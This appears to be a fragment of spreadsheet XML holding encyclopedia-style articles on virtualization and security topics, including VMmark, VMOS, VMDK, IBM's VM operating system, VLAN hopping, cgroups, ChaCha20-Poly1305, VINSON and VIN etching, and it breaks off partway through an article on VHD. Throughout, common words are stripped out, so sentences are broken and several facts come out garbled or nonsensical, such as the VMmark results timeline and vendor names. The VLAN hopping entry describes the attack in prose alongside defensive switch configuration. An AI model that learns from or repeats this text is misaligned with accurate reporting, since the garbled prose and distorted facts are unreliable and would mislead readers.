    <t>vmmark freeware virtual machine benchmark software suite vmware, inc. suite measures performance virtualized servers running load physical hardware. vmmark independently developed vmware. technical overview order measure efficiency virtualization layer hypervisor suite must several virtual machines (vms) simultaneously. each configured according template, three provided vmmark software. templates mimic typical software applications found corporate data centers, email servers, database servers, servers. vmmark software collects performance statistics relevant type application, commits second database servers, page accesses second servers.vms grouped logical units called "tiles". when evaluating system's performance, vmmark software first calculates score tile, culled performance statistics produced aggregates per-tile scores final number. software components vmmark uses mixture free/open source proprietary software virtual machine templates, apache http server servers microsoft exchange server email servers. industry reception reporting results consistent since introduction, results posted june 2013 june 2014 total results posted since introduction 2012.as 2008, four computer system vendors (dell computer, hewlett-packard, ibm, microsystems) submitted vmmark benchmark results vmware.by october 2009 increased vendors (hp, nec, ibm, unisys, sun, dell, inspur, lenovo, fujitsu cisco) references external links vmmark product page vmware, inc. vmmark white paper vmware, inc. virtualization committee spec</t>
  </si>
  <si>
    <t>VMOS (software)</t>
  </si>
  <si>
    <t>vmos virtual machine android, another android guest operating system. users optionally guest android rooted android vmos guest android operating system access google play store google apps. vmos first virtual machine android support google play services google apps. virtualization downloaded base virtualization core, however, android operating system image guest downloaded first opened being guest operating system virtualized environment, configurations like rooted android kernel guest, would affect host android operating system device. this, vmos allows running rooted android operating system phone virtualization without device actually rooted, thus issues warranty cellular carrier/provider. being virtual machine, guest android operating system separate disk image, thus virus threat something malicious guest operating system, affect host device host operating system. device requirements virtual machine app, requirements device must meet order app. requirement phone must least 32gb storage. also requires least ram. order virtualization optional user configured settings guest requires multiple permissions. guest settings vmos comes many configuration settings guest rooted android operating system option. some options include choosing display size resolution guest would use, ability import/clone apps host operating system, allowing phone calls, many others. known uses although used anything user wishes notable uses known. some major software developers suggest users install vmos software device running android operating system. known developers create android apps intended rooted android devices. another ability users multitask utilize instances many android apps single instance. huawei mate huawei mate known shipped official google play store related android system apps, huawei blacklist. huawei blacklist meant allowed hardware software. however, unofficial google play developed chinese developer, enabled users device download install android apps. however, unofficial google play eventually removed. however, many users found ways bring back unofficial google play app, well port google apps device. with ported android apps vmos, many reviewers critics device stated vmos able bring somewhat android operating system official google play apps device. huawei's next phone nova eventually actual google apps actual android operating system. reception virtual machine received range responses. however, gave positive remark fact virtualize android operating system. some positives received could used developers test android apps intended rooted devices, thus removing hassle developers faced rooting devices test apps. another positive given background, also floating window. thus guest host could used simultaneously. major pros ported non-android device like huawei mate user would able google apps, google play apps, well android operating system, ported vmos app. vmos also makes possible multiple accounts apps.some negatives found virtualized operating systems regardless platform host would never reach speed host. another issue raised size took phone. another negative stated online guest file system videos display lower resolution frame rate. also virtualization emulation android virtual machine references external links google play store link official website alternative</t>
  </si>
  <si>
    <t>VMDK</t>
  </si>
  <si>
    <t>vmdk (short virtual machine disk) file format describes containers virtual hard disk drives used virtual machines like vmware workstation virtualbox. initially developed vmware proprietary virtual appliance products, vmdk became open format revision 2011, disk formats used inside open virtualization format virtual appliances. maximum vmdk size generally applications, september 2013, vmware vsphere introduced 62tb vmdk capacity. support vmware virtualization products support vmdk; includes vmware workstation, vmware workstation player, vmware server, vmware fusion, vmware esx, vmware esxi, software-plus-service offerings incorporate them. third-party software support vmdk include: parallels desktop version qemu virtualbox former suse studio former (ancestor virtualbox) norton ghost paragon hard disk manager diskinternals vmfs recovery format vmdk format includes multiple differing subformats, store metadata external descriptor file, others embed main data single file. flat image allocates space ahead time sparse images grows virtual machine writes flat images underlying file system's sparse file capability, done vmfs format esxi. image also refer parent image store changes made copy-on-write fashion. this enables creating snapshot virtual machine's state. extents descriptor specifies series extents typically refer file device holds actual data, unless example type zero, emulates zero-filled extent. each extent marked either rdonly, noaccess signify virtual machine respectively read/write, read-only, access part disk. number types extents image depend createtype. image createtype="custom" contain arbitrary combination extents. virtual disk provisioning options flat disk images provisioned three ways: thin: blocks allocated zeroed initial provisioning. instead, image created sparse file. block allocation zeroing performed first access. zeroedthick: blocks allocated initial provisioning zeroed first access. eagerzeroedthick: blocks allocated zeroed initial provisioning. also virtual disk references external links vmware vmware virtual disk development (vddk)</t>
  </si>
  <si>
    <t>VM2000</t>
  </si>
  <si>
    <t>2000 hypervisor fujitsu (formerly siemens nixdorf informationssysteme) designed specifically bs2000 operating system. ebcdic-based operating system. allows multiple images bs2000 linux operate s-series computer, based system/390 architecture. also supports bs2000, linux microsoft windows x86-based sq-series mainframes. additionally, virtualize bs2000 guests sx-series mainframes, based mips sparc respectively. also paravirtualization references external links virtualization vm2000</t>
  </si>
  <si>
    <t>VM-aware storage</t>
  </si>
  <si>
    <t>vm-aware storage (vas) computer data storage designed specifically managing storage virtual machines (vms) within data center. goal provide storage simpler functionality better suited compared general-purpose storage. vm-aware storage allows storage managed integrated part managing rather logical unit numbers (luns) volumes separately configured managed. vm-aware storage often used conjunction vm-aware components processes vm-aware computer network, vm-aware backup vm-aware virus scanning. vm-aware storage similarities benefit software-defined networking, distinct latter provides general purpose physical equipment customized configured software whereas vm-aware storage designed virtual machines. background adoption server virtualization technology increased rapidly since launch vmware hypervisor 2001. 2009, estimated deployed physical machines.the ability consolidate applications running tens servers single physical server running hypervisor resulted cost savings servers well automated management servers. advantages, early 2010, many companies implemented "virtualization first" policies, stated server deployments virtual unless specific reasons physical server.as virtualization decreased cost server hardware, storage began dominate cost complexity virtual infrastructures. almost virtual management systems early 2000s, computing resources, memory, configured managed separately storage resources. server resources often managed separate team storage infrastructure. configuring servers storage separately trying work together often required significant advanced planning, integration troubleshooting. history improve manageability storage, storage vendors began make storage aware surrounding virtual components (often called virtual infrastructure). initial improvements consisted scripts plug-ins virtual infrastructures streamline common workflows allocating storage vms. result, tasks became simpler easier perform. benefits allow virtual infrastructures better leverage underlying storage system features snapshots, clones (writable snapshots), replication quality service (qos), hypervisor vendors began publish implement storage protocols extensions (vaai, storagelink) managing storage virtual environments. these early steps improve usability efficiency storage used virtual infrastructures address fundamental disconnect virtual infrastructures storage. namely, virtual infrastructure designed manage storage designed manage luns volumes, direct relationship vms. independently vmware, several startups also began provide vm-aware storage products using existing virtual infrastructure management interfaces. these storage products designed support abstractions allow storage management granularity vms. vmware announced vsphere storage appliance 2011. sold 2014. 2013, tintri using term products. comparison general-purpose general-purpose storage systems designed around storage protocols scsi, iscsi, network file system (nfs) server message block (smb) created advent virtualization. result, fundamental management abstractions luns volumes, little vms. general-purpose storage systems configured managed mostly independent virtual infrastructure. abstractions mapped onto storage administrators, must manage mapping create policies processes translating operations corresponding operations luns volumes.for example, standard protocols creating destroying luns volumes, virtual infrastructures store many single volume amortize provisioning management overhead. since general-purpose storage systems implement storage-management functionality monitoring, snapshots, cloning, replication luns volumes rather virtual disks, means storage systems lose ability perform operations individual vms. advance planning becomes necessary effectively manage storage.in contrast, vm-aware storage designed around vms. result, storage-management operations performed granularity storage managed integral part managing virtual infrastructure. also virtual machine hypervisor software-defined networking (sdn) direct-attached storage (das) storage area network (san) network-attached storage (nas) references</t>
  </si>
  <si>
    <t>VM (operating system)</t>
  </si>
  <si>
    <t>(often: vm/cms) family virtual machine operating systems used mainframes system/370, system/390, zseries, system compatible systems, including hercules emulator personal computers. following versions known: virtual machine facility/370 vm/370, released 1972, system/370 reimplementation earlier cp/cms operating system.vm/370 basic system extensions program product vm/bse (bsepp) enhancement vm/370 adds support devices (such 3370-type fixed-block-architecture dasd drives), improvements environment (such improved editor), stability enhancements cp.vm/370 system extensions program product vm/se (sepp) enhancement vm/370 includes facilities vm/bse, well additional fixes features.virtual machine/system product vm/sp, milestone version, replaces vm/370, vm/bse vm/se. release added exec2 xedit system product editor; release added rexx; release added shared filesystem. virtual machine/system product high performance option vm/sp adds additional device support functionality vm/sp, allows certain s/370 machines utilize real storage this version intended users would running multiple s/370 guests once. virtual machine/extended architecture migration vm/xa intended ease migration mvs/370 mvs/xa allowing concurrently processor complex. virtual machine/extended architecture system facility vm/xa upgraded vm/xa improved functionality performance. virtual machine/extended architecture system product vm/xa upgraded vm/xa improved functionality performance, offered replacement vm/sp machines supporting s/370-xa. includes version either s/370 s/370-xa mode. virtual machine/enterprize systems architecture vm/esa provides facilities vm/sp, vm/sp vm/xa vm/esa version s/370, esa/370 esa/390 mode; support s/370 mode. version runs esa/390 mode. s/370-capable versions vm/esa actually separate version esa/390 versions vm/esa, s/370 versions based older vm/sp codebase, esa/390 versions based newer vm/xa codebase. z/vmz/vm, last version still widely used main full virtualization solutions mainframe market. z/vm last version could esa/390 mode; subsequent versions z/architecture mode.the name refers conversational monitor system, component product single-user operating system runs virtual machine provides conversational time-sharing overview heart architecture control program hypervisor abbreviated vm-cp sometimes, ambiguously, runs physical hardware, creates virtual machine environment. vm-cp provides full virtualization physical machine including privileged operations. performs system's resource-sharing, including device management, dispatching, virtual storage management, traditional operating system tasks. each user provided separate virtual machine address space, virtual devices, etc., capable running software could stand-alone machine. given mainframe typically runs hundreds thousands virtual machine instances. vm-cp began life cp-370, reimplementation cp-67, reimplementation cp-40. running within virtual machine another operating system, guest operating system. this might (conversational monitor system, renamed cambridge monitor system cp/cms). most virtual machines cms, lightweight, single-user operating system. interactive environment comparable single-user including file system, programming services, device access, command-line processing. (while earlier version uncharitably described "cp/m mainframe", comparison anachronism; author cp/m, gary kildall, experienced user.) (group control system), provides limited simulation api. originally provided order vtam without service os/vs1 virtual machine vtam communications network application (vcna). rscs also gcs. mainstream operating system. ibm's mainstream operating systems (i.e. mvs, dos/vse, tss/370 families) loaded without modification. hypervisor treats guest operating systems application programs exceptional privileges prevents directly using privileged instructions (those would applications take whole system significant parts it), simulates privileged instructions behalf. most mainframe operating systems terminate normal application tries usurp operating system's privileges. hypervisor simulate several types console terminals guest operating system, hardcopy line-mode 3215, graphical 3270 family, integrated console newer system/390 system machines. other users access running virtual machines using dial command logon screen, connect terminal first available emulated 3270 device, first available 2703 device user dialing typewriter terminal. another copy second level instance fully virtualized inside virtual machine. this development testing done second-level potentially implement different virtualization hardware). this technique used develop s/370 software s/370 hardware available, continued play role hardware development ibm. literature cites practical examples virtualization five levels deep. levels also treated applications exceptional privileges. copy mainframe version linux. mainframe environment, operating systems often handled like guest operating systems. (they also 'native' operating systems bare hardware.) there also short-lived ix/370, well s/370 s/390 versions (aix/370 aix/esa). specialized subsystem. several non-cms systems within vm-cp virtual machines, providing services users spooling, interprocess communications, specialized device support, networking. they operate behind scenes, extending services available without adding vm-cp control program. running separate virtual machines, receive security reliability protections users. examples include: rscs (remote spooling communication subsystem, vnet) communication information transfer facilities virtual machines systems racf (resource access control facility) security system shared file system (sfs), organizes shared files directory tree (the servers commonly named "vmservx" vtam (virtual telecommunications access method) facility provides support systems network architecture network (vm/pass-through facility) facility provides remote access systems tcpip, smtp, ftpserve, portmap, vmnfs service machines provide tcp/ip networking vm/cms server database system, servers often named similarly "sqlmach" "sqlmstr" dirmaint simplified user directory management system (the directory listing every account system, including virtual hardware configuration, user passwords, minidisks). mumps/vm implementation mumps database programming language could guest vm/370. mumps/vm introduced 1987 discontinued 1991. user-written modified operating system, national css's boston university's vps/vm. hypervisor interface coined term hypervisor 360/65 later used diag handler cp-67. diagnose instruction ('83'x—no mnemonic) privileged instruction originally intended perform "built-in diagnostic functions, model-dependent functions." repurposed diag "communication virtual machine cp." instruction contains four-bit register numbers, called "contain operand storage addresses return codes passed diagnose interface," two-byte code "that uses determine diagnose function perform." available diagnose functions listed below. diagnose time, capable running bare machine, true operating system (though configuration would unusual). runs guest this relies hypervisor interface vm-cp, perform file system operations request services. this paravirtualization interface: provides fast path vm-cp, avoid overhead full simulation. first developed performance improvement cp/cms release 2.1, important early milestone cp's efficiency. uses non-virtualized, model-dependent machine instruction signal diag (diagnose). minidisks operating systems often dasd requirements much smaller sizes actual volumes. reason allows installation define virtual disks size capacity device. volumes, minidisk must defined full cylinders. minidisk attributes underlying real disk, except usually smaller beginning minidisk mapped cylinder block minidisk accessed using channel programs real disk. minidisk initialized file system referred minidisk, although system them. common practice define full volume minidisks guest operating systems z/os instead using dedicate assign volume specific virtual machine. addition, "full-pack links" often defined every dasd system, owned maint userid. these used backing system using dasd dump/restore program, entire contents dasd written tape another dasd) exactly. shared file system vm/sp release introduced shared file system vastly improved file storage capabilities. minidisk file system support directories (folders) all, however, does. also introduces granular security. with minidisks, system configured allow deny users read-only read-write access disk, single files cannot security. alleviates this, vastly improves performance. provided service virtual machines. modern system, usually three required: vmservr, "recovery machine" actually serve files; vmservs, server vmsys filepool; vmservu, server vmsysu (user) filepool. file pool server machines several minidisks, usually including a-disk (virtual device address 191, containing file pool configuration files), control disk, disk, number data disks actually store user files. with modern versions, system installed sfs, remaining minidisks ones absolutely necessary system start ones owned filepool server machines. user account configured (and minidisks), user's a-disk filepool:userid. subsequent directories user creates filepool:userid.dir1.dir2.dir3 equivalent unix file path /dir1/dir2/dir3. directories much granular access controls compared minidisks (which, mentioned above, often read password, write password, multi-write password). directories also solve issues arise users write minidisk time, cause disk corruption performing writes unaware another instance also writing minidisk). file pool server machines also serve closely related filesystem: byte file system. used store files unix-style filesystem. primary openextensions posix environment cms. user virtual machines communicate server virtual machines iucv mechanism. history early history described articles cp/cms history cp/cms. vm/370 reimplementation cp/cms, made available 1972 part ibm's system/370 advanced function announcement (which added virtual memory hardware operating systems system/370 series). early releases vm/370 release continued open source 1981, today considered public domain. this policy ended 1977 chargeable vm/se vm/bse upgrades 1980 vm/system product (vm/sp). however, continued providing updates source form existing code many years, although upgrades free base required license. cp-67, privileged instructions virtual machine cause program interrupt, simulated behavior privileged instruction. remained important platform within ibm, used operating system development time-sharing use; customers remained ibm's "other operating system". families remained ibm's strategic products, customers encouraged those formed close working relationships, continuing community-support model early cp/cms users. meantime, system struggled political infighting within resources available project, compared efforts. basic problem system seen ibm's field sales level: vm/cms demonstrably reduced amount hardware needed support given number time-sharing users. was, all, business selling computer systems. melinda varian provides fascinating quote, illustrating vm's unexpected success: marketing forecasts vm/370 predicted would ever entire life product. fact, first delivered customer cms. years later, percent large processors shipped poughkeepsie would destined would substantial portion mid-range machines built endicott. before fifteen years passed, would licenses licenses. version runs xt/370 (and later at/370) called vm/pc. vm/pc based vm/sp release when introduced p/370 p/390 processor cards, could full systems, including vm/370, vm/sp, vm/xa, vm/esa (these cards fully compatible s/370 s/390 mainframes, could s/370 operating system 31-bit era, e.g., mvs/esa, vse/esa). addition base vm/sp releases, also introduced vm/sp (high performance option). this add-on (which installed base vm/sp release) improved several system facilities, including allowing usage storage (ram) supported models (such 4381). with vm/sp installed, limit however, single user virtual machine) could functions spool filesystem also improved, allowing 9900 spool files created user, rather 9900 whole system. architecture spool filesystem also enhanced, spool file unique user associated reader file control blocks held virtual storage. system could also configured deny certain users access vector facility means user directory entries).releases since vm/sp release supported multiprocessor systems. system/370 versions (such vm/sp vm/sp hpo) supported maximum processors, system operating either (uniprocessor) mode, (multiprocessor) mode, (attached processor) mode. mode mode, except second processor lacks capability. system/370-xa releases (such vm/xa) supported more. system/390 releases (such vm/esa) almost removed limit entirely, modern z/vm systems many processors. per-vm limit defined processors when introduced system/370 extended architecture 3081, customers faced need production mvs/370 system testing mvs/xa machine. ibm's solution vm/xa migration aid, used start interpretive execution (sie) instruction virtual machine. automatically handled privileged instructions returned cases handle. processor resource/system manager (pr/sm) later 3090 also used sie. there several vm/xa products eventually supplanted vm/esa z/vm. addition rscs networking, also provided users vtam networking. acf/vtam fully compatible acf/vtam vse. like rscs, vtam specialized operating system. however, also supported tcp/ip networking. late 1980s, produced tcp/ip stack vm/sp vm/xa. stack supported ipv4 networks, variety network interface systems (such inter-mainframe channel-to-channel links, specialized would relay traffic token ring ethernet network). stack provided support telnet connections, either simple line-mode terminal emulators vt100-compatible emulators, proper 3270 terminal emulators. stack also provided server. also produced optional server early versions rather primitive, modern versions much advanced.there also fourth networking option, known vm/pass-through facility commonly called, pvm). pvm, like vtam, allowed connections remote vm/cms systems, well systems. vm/cms nodes linked together channel-to-channel link bisync link (possibly using dialup modem leased line), user could remotely connect either system entering "dial pvm" login screen, entering system node name choosing list available nodes). alternatively, user running could passthru program installed alongside pvm, allowing quick access remote systems without user's session. also supported accessing non-vm systems, utilizing 3x74 emulation technique. later releases also featured component could accept connections network. also cornerstone operating system bitnet, rscs system available provided simple network easy implement, somewhat reliable. sites interlinked means rscs system communicating another, users could send receive messages, files, batch jobs rscs. "note" command used xedit display dialog create email, user could send user specified address form user node, email file would delivered rscs, would deliver target user target system. site tcp/ip installed, rscs could work smtp service machine deliver notes (emails) remote systems, well receive them. user specified user some.host.name, note program would deliver email smtp service machine, would route destination site internet. vm's role changed within hardware evolution significant changes processor architecture. backward compatibility remained cornerstone mainframe family, still uses basic instruction introduced original system/360; need efficient 64-bit zseries made approach much attractive. also utilized data centers converting dos/vse useful running mainframe linux, platforms become increasingly important. current z/vm platform finally achieved recognition within users long felt deserved. some z/vm sites thousands simultaneous virtual machine users single system. z/vm first released october 2000 remains active development. third parties offered many applications tools examples include ramis, focus, spss, nomad, db2, rexx, racf, officevision. current offerings gamut mainframe applications, including http servers, database managers, analysis tools, engineering packages, financial systems. commands release vm/370 control program number commands general users, concerned defining controlling user's virtual machine. lower-case portions command optional openedition extensions starting vm/esa version introduced chargeable optional feature openedition vm/esa shell utilities feature, provides posix compatibility cms. stand-out feature unix shell cms. compiler unix environment provided either c/370 vm/esa. neither filesystem standard shared file system support unix-style files paths; instead, byte file system used. once extent created file pool, user mount using openvm mount /../vmbfs:fileservername:filepoolname /path/to/mount/point. user must also mount root filesystem, done openvm mount /../vmbfs:vmsys:root/ shell started openvm shell. unlike normal sfs, access filesystems controlled posix permissions (with chmod chown). starting z/vm version integrated openedition z/vm renamed openextensions. openedition openextensions provide posix.2 compliance cms. programs compiled openextensions shell stored format standard executable modules. visual editors, unavailable, 3270 terminals capable. users xedit instead mascot early 1980s, group within share (the user group) sought mascot logo community adopt. this part response ibm's users selecting turkey mascot (chosen, according legend, performance group early days mvs, performance sore topic). 1983, teddy bear became vm's facto mascot share teddy bear stickers attached nametags "cuddlier oldtimers" flag newcomers "friendly approached". bears soon appeared widely. bears awarded inductees "order knights vm", individuals made "useful contributions" community. criticism while relatively light-weight (when compared counterparts, mvs), somewhat unstable early days. considered quite feat keep vm/370 system week. users also criticized file system, noting operating systems mid-1980s directories, symbolic links, features; none 1988 vm/sp release came out, introduced shared file system alleviated issues. some users also noted openedition somewhat "unnecessary." notes also time-sharing system evolution references external links sources ducharme, operating systems handbook, part vm/cms– fairly detailed user's guide vm/cms hendricks hartmann, "evolution virtual machine subsystem", systems journal vol. 111–142 (1979)– rscs design implementation corporation, virtual machine facility/370 introduction, gc20-1800, (1972)– original manual primary cp/cms sources additional cp/cms sources background cp/cms sources additional on-line cp/cms resources other resources redbooks publication z/vm textbook ibm: z/vm portal ibm: z/vm manuals vm/pc documentation bitsavers</t>
  </si>
  <si>
    <t>VLAN hopping</t>
  </si>
  <si>
    <t>vlan hopping computer security exploit, method attacking networked resources virtual (vlan). basic concept behind vlan hopping attacks attacking host vlan gain access traffic vlans would normally accessible. there primary methods vlan hopping: switch spoofing double tagging. both attack vectors mitigated proper switch port configuration. switch spoofing switch spoofing attack, attacking host imitates trunking switch speaking tagging trunking protocols (e.g. multiple vlan registration protocol, ieee 802.1q, dynamic trunking protocol) used maintaining vlan. traffic multiple vlans accessible attacking host. mitigation switch spoofing exploited interfaces negotiate trunk. prevent attack cisco ios, following methods:: ensure ports negotiate trunks automatically disabling dtp: switch (config-if)# switchport nonegotiate ensure ports meant trunks explicitly configured access ports switch (config-if)# switchport mode access double tagging double tagging attack, attacker connected 802.1q-enabled port prepends vlan tags frame transmits. frame (externally tagged vlan attacker's port really member forwarded without first native vlan trunk interface. second visible second switch frame encounters. this second vlan indicates frame destined target host second switch. frame sent target host though originated target vlan, effectively bypassing network mechanisms logically isolate vlans another. however, possible replies forwarded attacking host (unidirectional flow). mitigation double tagging exploited switch ports configured native vlans.: trunk ports configured native vlan apply vlan sending frames. this allows attacker's fake vlan read next switch.double tagging mitigated following actions (incl. example): simply hosts vlan (the default vlan). i.e., assign access vlan vlan every access port switch (config-if)# switchport access vlan change native vlan trunk ports unused vlan switch (config-if)# switchport trunk native vlan explicit tagging native vlan trunk ports. must configured switches network autonomy. switch(config)# vlan dot1q native example example double tagging attack, consider secure server vlan called vlan2. hosts vlan2 allowed access server; hosts outside vlan2 blocked layer filters. attacking host separate vlan, called vlan1(native), creates specially formed packet attack server. places header tagging packet belonging vlan2 header tagging packet belonging vlan1. when packet sent, switch sees default vlan1 header removes forwards packet. next switch sees vlan2 header puts packet vlan2. packet thus arrives target server though sent another host vlan2, ignoring layer filtering might place. also private vlan references</t>
  </si>
  <si>
    <t>Cgroups</t>
  </si>
  <si>
    <t>cgroups (abbreviated control groups) linux kernel feature limits, accounts for, isolates resource usage (cpu, memory, disk i/o, network, etc.) collection processes. engineers google (primarily paul menage rohit seth) started work feature 2006 name "process containers". late 2007, nomenclature changed "control groups" avoid confusion caused multiple meanings term "container" linux kernel context, control groups functionality merged linux kernel mainline kernel version 2.6.24, released january 2008. since then, developers added many features controllers, support kernfs 2014, firewalling, unified hierarchy. cgroup merged linux kernel significant changes interface internal functionality. versions there versions cgroups. cgroups originally written paul menage rohit seth, mainlined linux kernel 2007. afterwards called cgroups version 1.development maintenance cgroups taken tejun heo. tejun redesigned rewrote cgroups. this rewrite called version documentation cgroup-v2 first appeared linux kernel released march 2016.unlike cgroup single process hierarchy discriminates processes, threads. features design goals cgroups provide unified interface many different cases, controlling single processes using nice, example) full operating system-level virtualization provided openvz, linux-vserver lxc, example). cgroups provides: resource limiting groups exceed configured memory limit, also includes file system cache prioritization groups larger share utilization disk throughput accounting measures group's resource usage, used, example, billing purposes control freezing groups processes, checkpointing restarting control group (abbreviated cgroup) collection processes bound criteria associated parameters limits. these groups hierarchical, meaning group inherits limits parent group. kernel provides access multiple controllers (also called subsystems) cgroup interface; example, "memory" controller limits memory use, "cpuacct" accounts usage, etc. control groups used multiple ways: accessing cgroup virtual file system manually. creating managing groups using tools like cgcreate, cgexec, cgclassify (from libcgroup). through "rules engine daemon" automatically move processes certain users, groups, commands cgroups specified configuration. indirectly software uses cgroups, docker, firejail, lxc, libvirt, systemd, open grid scheduler/grid engine, google's developmentally defunct lmctfy.the linux kernel documentation contains technical details setup control groups version version systemd-cgtop command used show control groups resource usage. redesign redesign cgroups started 2013, additional changes brought versions 3.15 3.16 linux kernel. namespace isolation while technically part cgroups work, related feature linux kernel namespace isolation, groups processes separated cannot "see" resources groups. example, namespace provides separate enumeration process identifiers within namespace. also available mount, user, uts, network sysv namespaces. namespace provides isolation allocation process identifiers (pids), lists processes details. while namespace isolated siblings, processes "parent" namespace still processes child namespaces—albeit different numbers. network namespace isolates network interface controllers (physical virtual), iptables firewall rules, routing tables etc. network namespaces connected using "veth" virtual ethernet device. "uts" namespace allows changing hostname. mount namespace allows creating different file system layout, making certain mount points read-only. namespace isolates system inter-process communication namespaces. user namespace isolates user namespaces. cgroup namespacenamespaces created "unshare" command syscall, flags "clone" syscall.the "ns" subsystem added early cgroups development integrate namespaces control groups. "ns" cgroup mounted, namespace would also create group cgroup hierarchy. this experiment later judged poor cgroups api, removed kernel. linux namespaces inspired general namespace functionality used heavily throughout plan bell labs. unified hierarchy kernfs introduced linux kernel version 3.14 march 2014, main author tejun heo. main motivators separate kernfs cgroups file system. kernfs basically created splitting sysfs logic independent entity, thus easing kernel subsystems implementation virtual file system handling device connect disconnect, dynamic creation removal, attributes. redesign continued version 3.15 linux kernel. kernel memory control groups (kmemcg) kernel memory control groups (kmemcg) merged version (2013 february (18-02-2013)) linux kernel mainline. kmemcg controller limit amount memory kernel utilize manage internal processes. cgroup awareness killer linux kernel 4.19 (october 2018) introduced cgroup awareness killer implementation adds ability kill cgroup single unit guarantee integrity workload. adoption various projects cgroups basis, including coreos, docker 2013), hadoop, jelastic, kubernetes, lmctfy (let contain that you), (linux containers), systemd, mesos mesosphere, htcondor. major linux distributions also adopted enterprise linux (rhel) november 2010, three years adoption mainline linux kernel.on october 2019, fedora project modified fedora cgroupsv2 default also operating system–level virtualization implementations process group (linux) traffic control utility slightly overlapping functionality network-oriented cgroup settings references external links official linux kernel documentation cgroups cgroups resource management guide cgroups ubuntu manpage cgroups linux kernel namespaces cgroups rami rosen (2013) namespaces cgroups, basis linux containers (including cgroups v2), slides talk rami rosen, netdev 1.1, seville, spain, 2016 understanding control groups api, lwn.net, rami rosen, march 2016 large-scale cluster management google borg, april 2015, abhishek verma, luis pedrosa, madhukar korupolu, david oppenheimer, eric tune john wilkes objects, similar feature windows</t>
  </si>
  <si>
    <t>ChaCha20-Poly1305</t>
  </si>
  <si>
    <t>chacha20-poly1305 authenticated encryption additional data (aead) algorithm, combines chacha20 stream cipher poly1305 message authentication code. usage ietf protocols standardized 8439. fast software performance, without hardware acceleration, usually faster aes-gcm. history building blocks construction, algorithms poly1305 chacha20, independently designed, 2005 2008, daniel bernstein.in 2013–2014, variant original chacha20 algorithm (using 32-bit counter 96-bit nonce) variant original poly1305 (authenticating strings) combined ietf draft used dtls, chosen google, security performance reasons, newly supported cipher. shortly google's adoption tls, chacha20, poly1305 combined aead mode added openssh thechacha20-poly1305@openssh.com authenticated encryption cipher kept original 64-bit counter 64-bit nonce chacha20 algorithm. 2015, aead algorithm standardized 7539 7905 used dtls 7634 used ipsec. year, integrated cloudflare alternative ciphersuite.in june 2018, 7539 updated replaced 8439. description chacha20-poly1305 algorithm described 8439 take input 256-bit 96-bit nonce encrypt plaintext, ciphertext expansion 128-bit (the size). chacha20-poly1305 construction, chacha20 used counter mode derive stream xored plaintext. ciphertext associated data authenticated using variant poly1305 first encodes strings one. variants xchacha20-poly1305 extended nonce variant xchacha20-poly1305 construction extended 192-bit nonce variant chacha20-poly1305 construction, using xchacha20 instead chacha20. when choosing nonces random, xchacha20-poly1305 construction allows better security original construction. draft attempt standardize construction expired july 2020. salsa20-poly1305 xsalsa20-poly1305 salsa20-poly1305 xsalsa20-poly1305 variants chacha20-poly1305 xchacha20-poly1305 algorithms, using salsa20 xsalsa20 place chacha20 xchacha20. they implemented nacl libsodium standardized. variants using chacha preferred practice provides better diffusion round salsa. chacha20-poly1305 used ipsec, ssh, 1.2, dtls 1.2, 1.3, quic, wireguard, s/mime 4.0, otrv4 multiple protocols. among others, implemented openssl, openssh libsodium. performance chacha20-poly1305 usually offers better performance prevalent aes-gcm algorithm systems cpu(s) feature aes-ni instruction extension. result, chacha20-poly1305 sometimes preferred aes-gcm similar levels security certain cases involving mobile devices, mostly arm-based cpus. security chacha20-poly1305 construction proven secure standard model ideal permutation model, single- multi-user setting. however, similarly gcm, security relies choosing unique nonce every message encrypted. compared aes-gcm, implementations chacha20-poly1305 less vulnerable timing attacks. also authenticated encryption galois/counter mode salsa20 poly1305 external links 8439: chacha20 poly1305 ietf protocols 7634: chacha20, poly1305, their internet exchange protocol (ike) ipsec 7905: chacha20-poly1305 cipher suites transport layer security (tls) 8103: using chacha20-poly1305 authenticated encryption cryptographic message syntax (cms) references</t>
  </si>
  <si>
    <t>VINSON</t>
  </si>
  <si>
    <t>vinson family voice encryption devices used u.s. allied military enforcement, based nsa's classified suite saville encryption algorithm kbit/s cvsd audio compression. replaces vietnam war-era nestor (ky-8/ky-28|28/ky-38|38) family. these devices provide tactical secure voice line sight (los), satcom communication tactical phone systems. these terminals unclassified controlled cryptographic items (cci) unkeyed classified keymat going secure. vinson devices include: ky-57 ky-58 ky-68 ky-99a (minterm) ky-100 (airterm) kyv-2 fascinatorvinson embedded many modern military radios, sincgars. many multi-algorithm comsec modules also backwards-compatible vinson. also advanced narrowband digital voice terminal (andvt) system bandwidth secure voice communications replaced vinson.</t>
  </si>
  <si>
    <t>VIN etching</t>
  </si>
  <si>
    <t>etching countermeasure motor vehicle theft, involves etching vehicle's onto windows reduce value stolen vehicle thieves. description etching uses variety methods, commonly stencil acidic etching paste, engrave vehicle's vehicle identification number (vin) onto windshield windows. most parts vehicle already least partial stamped onto them, many auto parts buyers purchase parts carry identification numbers. should thief sell parts vehicle profit, marked parts carry higher risk thief auto parts seller. since automotive glass generally identification numbers often interchangeable among many different years models vehicles, usually yields much greater profit thief compared components vehicle; vehicle's windows stamped vin, thieves would need discard glass "parting out" stolen vehicle, thus reducing eliminating profit. etching also increase odds recovery stolen police.vin etching recommended police departments, insurance agencies, government automobile/vehicle theft prevention agencies this service sometimes offered free charge sponsored events.vehicles vin-etched windows eligible insurance rate reductions much states.some automobile dealers include etching extra service boost profit margin selling vehicle; even pre-print charge etching bill sale, suggest etching mandatory rather optional, add-on service. inflated dealership fees $200 $2,000 etching unheard however, consumer advocates note states require dealers offer etching, states require consumers purchase dealer.consumers want etched vehicle windows unable find free etching service area often save hundreds dollars dealership using do-it-yourself etching purchased internet retailer local auto parts dealer, little $20–25. references</t>
  </si>
  <si>
    <t>VHD (file format)</t>
  </si>
  <si>
    <t>(virtual hard disk) successor vhdx file formats representing virtual hard disk drive (hdd). they contain found physical hdd, disk partitions file system, turn contain files folders. they typically used hard disk virtual machine, built modern versions windows, native file format microsoft's hypervisor (virtual machine system), hyper-v. format created connectix virtual product, known microsoft virtual since microsoft acquired connectix 2003. vhdx introduced windows 8/windows server 2012 features flexibility missing become apparent time. since june 2005, microsoft made vhdx image format specifications available third parties microsoft open specification promise. features virtual hard disk allows multiple operating systems reside single host machine. this method enables developers test software different operating systems without cost hassle installing second hard disk partitioning single hard disk multiple volumes. ability directly modify virtual machine's hard disk host server supports many applications, including: moving files host file system backup recovery antivirus security image management patching disk conversion (physical virtual, vice versa) life-cycle management provisioning (re)vhdx added hyper-v windows server 2012 larger storage capacity, data corruption protection, optimizations prevent performance degradation large-sector physical disks. supported formats vhds implemented files reside native host file system. following types formats supported microsoft virtual 